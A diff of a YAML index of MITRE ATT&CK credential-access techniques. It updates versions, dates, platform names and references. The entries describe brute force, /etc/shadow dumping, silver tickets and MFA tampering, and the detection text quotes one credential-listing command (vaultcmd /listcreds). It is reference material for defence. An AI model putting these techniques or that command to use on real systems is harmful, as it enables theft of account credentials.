+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -46304,11 +47059,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -46352,11 +47106,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -46380,8 +47133,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -46397,11 +47150,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46412,11 +47164,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -46426,16 +47180,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -46473,13 +47227,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46488,6 +47239,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -46495,11 +47247,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -46517,13 +47269,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -46536,6 +47285,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -46549,12 +47299,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -46586,17 +47337,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -46669,12 +47417,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -46683,6 +47430,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -46701,18 +47449,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -46736,13 +47484,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -46768,6 +47513,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -46779,18 +47525,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -46809,14 +47555,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -46845,24 +47588,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -46897,13 +47642,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -46981,14 +47723,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -47004,6 +47745,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47012,13 +47754,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -47026,15 +47768,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -47045,9 +47783,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -47093,7 +47830,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -47112,17 +47849,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -47155,10 +47891,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -47195,11 +47930,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47267,34 +48001,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47303,20 +48013,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -47348,7 +48080,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47374,13 +48106,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -47397,24 +48127,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -47455,36 +48185,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47505,6 +48212,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -47519,52 +48227,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
